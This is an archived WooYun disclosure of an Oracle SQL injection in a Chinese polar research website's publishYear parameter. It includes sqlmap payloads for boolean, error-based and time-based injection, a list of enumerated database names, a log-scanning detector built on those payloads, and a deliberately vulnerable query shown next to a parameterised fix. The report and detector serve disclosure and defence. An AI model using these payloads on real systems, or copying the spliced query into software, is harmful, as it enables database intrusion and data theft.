WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
WooYun Drops articles, online reader --------http://drop.zone.ci/
2014-01-22: Details sent to the vendor, awaiting vendor handling
2014-01-27: Vendor confirmed; details disclosed to the vendor only
2014-02-06: Details disclosed to core white hats and relevant domain experts
2014-02-16: Details disclosed to regular white hats
2014-02-26: Details disclosed to intern white hats
2014-03-08: Details disclosed to the public
Oracle injection
1. Affected URL
http://www.chinare.org.cn/newsList/?page=2&publishYear=2012 (GET)
2. Proof; a great many databases are involved
sqlmap identified the following injection points with a total of 251 HTTP(s) requests:
---
Place: GET
Parameter: publishYear
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: page=2&publishYear=2012) AND 8125=8125 AND (3473=3473

    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)
    Payload: page=2&publishYear=2012) AND 6429=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(111)||CHR(116)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (6429=6429) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(105)||CHR(101)||CHR(97)||CHR(113)) AND (7411=7411

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind (heavy query)
    Payload: page=2&publishYear=2012) AND 3939=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND (8134=8134
---
web server operating system: Linux Red Hat Enterprise 6 (Santiago)
web application technology: Apache 2.2.15
back-end DBMS: Oracle
available databases [63]:
[*] APEX_030200
[*] APPQOSSYS
[*] ARCTICECOLOGY
[*] AURORA
[*] AURORA_V2
[*] AUTH45_ARCHIVES
[*] BASICDATA
[*] BIRDS
[*] BIRDS_OFBIZ
[*] BIRDSDICIKPG
[*] CCMPE
[*] CHINARENADC
[*] CTXSYS
[*] DBSNMP
[*] DP_GREATWALL_DB
[*] DP_ZHONGSHAN_DB
[*] DSP
[*] ECOLOGY
[*] ECOLOGY_V2
[*] EXFSYS
[*] FLOWS_FILES
[*] GDDA26_T
[*] GDDA45_ARCHIVES
[*] GEODATA
[*] GEOMAGNETISM
[*] GEOSPACE
[*] INTERLIB
[*] IONOSPHERE
[*] JIDIUSER
[*] LS_COMM
[*] LS_PRIC
[*] MDSYS
[*] METEOROLOG
[*] OCEAN
[*] OGG
[*] OLAPSYS
[*] OPENCMS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] PEMSUSER
[*] PERISWEB
[*] PLOT
[*] POLARDOOR
[*] POLARER
[*] PORTALFLAT
[*] PRICCNLITER
[*] REMOTESENSOR
[*] SCOTT
[*] SDE
[*] SIG
[*] SOFTSCIENCE
[*] STATION_GW
[*] STATION_ZS
[*] SUBMISSION
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
[*] XLWEB
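The three sqlmap techniques listed above (boolean-based tautology, Oracle error-based via UTL_INADDR, and the ALL_USERS heavy-query delay) leave recognisable traces in the web server's access log. The following is an added detection example written for this page, not code from the report's author or from the affected site: it parses Apache combined-format log lines, percent-decodes each query-string parameter, and flags values matching those three patterns. The log lines are constructed for the example (the site is stated to run Apache 2.2.15, but these are not its real logs), and the signature names and the regexes are this example's own.

```python
import re
from urllib.parse import parse_qsl, urlparse

# Regexes derived from the three sqlmap payload families shown in the report.
# Names are this example's own, not sqlmap's.
SIGNATURES = {
    "boolean-tautology": re.compile(r"\bAND\s+\(?\d+\s*=\s*\d+", re.I),
    "oracle-error-based": re.compile(r"UTL_INADDR\.GET_HOST_ADDRESS|CHR\(\d+\)\s*\|\|", re.I),
    "oracle-heavy-query": re.compile(r"FROM\s+ALL_USERS\s+T1\s*,\s*ALL_USERS\s+T2", re.I),
}

# Constructed Apache combined-format lines (not the target's real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [22/Jan/2014:10:01:02 +0800] "GET /newsList/?page=2&publishYear=2012 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [22/Jan/2014:10:01:03 +0800] "GET /newsList/?page=2&publishYear=2012)%20AND%208125=8125%20AND%20(3473=3473 HTTP/1.1" 200 5120 "-" "sqlmap/1.0"
10.0.0.5 - - [22/Jan/2014:10:01:04 +0800] "GET /newsList/?page=2&publishYear=2012)%20AND%206429=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(111)) HTTP/1.1" 500 310 "-" "sqlmap/1.0"
10.0.0.5 - - [22/Jan/2014:10:01:09 +0800] "GET /newsList/?page=2&publishYear=2012)%20AND%203939=(SELECT%20COUNT(*)%20FROM%20ALL_USERS%20T1,ALL_USERS%20T2) HTTP/1.1" 200 5120 "-" "sqlmap/1.0"
"""

# Pulls the request line ("GET /path?query HTTP/1.1") out of a combined-format entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def scan_line(line):
    """Return a list of (parameter_name, signature_name) hits for one log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    # parse_qsl splits on the first '=' and percent-decodes the value,
    # so the regexes see the SQL text the application would have received.
    params = parse_qsl(urlparse(m.group("target")).query, keep_blank_values=True)
    hits = []
    for name, value in params:
        for sig_name, pattern in SIGNATURES.items():
            if pattern.search(value):
                hits.append((name, sig_name))
    return hits


def scan_log(text):
    """Scan a whole log; returns [(line_number, hits), ...] for lines with at least one hit."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        hits = scan_line(line)
        if hits:
            findings.append((lineno, hits))
    return findings


if __name__ == "__main__":
    for lineno, hits in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {hits}")
```

Only the parameter value is inspected, so a normal request with publishYear=2012 produces no hit, while each of the three probe styles is attributed to the parameter it arrived in; in practice the same scan can be run over the whole log file instead of the embedded sample.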
3. There are many more injection points; go look them up yourselves... submitted to farm rank points
See details
Filtering
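The suggested fix is input filtering; for a numeric parameter such as publishYear the robust form of that is a strict allow-list check followed by a bind variable, rather than a blacklist of quotes and keywords. The following is an added example written for this page, not code from the report's author or from the affected site. It contrasts the string-splicing pattern that the sqlmap output implies with a validated, parameterised query. The table, its rows and the column names are constructed; SQLite stands in for Oracle because it uses the same :name bind syntax that cx_Oracle and python-oracledb accept with a dict of values.

```python
import re
import sqlite3

# Constructed stand-in for the site's news table (the real schema is not on the page).
SAMPLE_ROWS = [
    (1, "Expedition report", 2012),
    (2, "Station notice", 2012),
    (3, "Old bulletin", 2011),
]

# Allow-list: exactly four digits, years 1900..2099.
YEAR_RE = re.compile(r"(19|20)\d{2}")


def validate_publish_year(raw):
    """Return the year as int, or raise ValueError. Anything that is not a
    plain four-digit year is rejected before it gets near the database."""
    if raw is None or not YEAR_RE.fullmatch(raw.strip()):
        raise ValueError(f"rejected publishYear: {raw!r}")
    return int(raw)


def _db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER, title TEXT, publish_year INTEGER)")
    conn.executemany("INSERT INTO news VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def count_vulnerable(raw_year):
    """The pattern the report implies: the raw parameter is spliced into the SQL text,
    so whatever follows the digits is parsed and evaluated as SQL."""
    conn = _db()
    sql = "SELECT COUNT(*) FROM news WHERE (publish_year = %s)" % raw_year
    return conn.execute(sql).fetchone()[0]


def count_safe(raw_year):
    """Validated value passed as a bind variable; the SQL text never changes.
    Oracle drivers take the same ':publish_year' placeholder with a dict."""
    year = validate_publish_year(raw_year)
    conn = _db()
    sql = "SELECT COUNT(*) FROM news WHERE publish_year = :publish_year"
    return conn.execute(sql, {"publish_year": year}).fetchone()[0]


if __name__ == "__main__":
    # The boolean-based payload from the report, spliced in, still runs as SQL:
    print(count_vulnerable("2012) AND 8125=8125 AND (3473=3473"))
    # The hardened path refuses it outright:
    try:
        count_safe("2012) AND 8125=8125 AND (3473=3473")
    except ValueError as e:
        print(e)
```

In the vulnerable function the report's boolean payload returns the same count as a plain 2012, and flipping one digit of the tautology returns zero; that difference is exactly the signal a boolean-based blind test measures. In the hardened function the same input never reaches the query at all.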
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2014-01-27 09:12
CNVD has confirmed and reproduced the described issue, and has directly contacted the Polar Office of the State Oceanic Administration (国家海洋局极地办公室) to notify it of the vulnerability.
None yet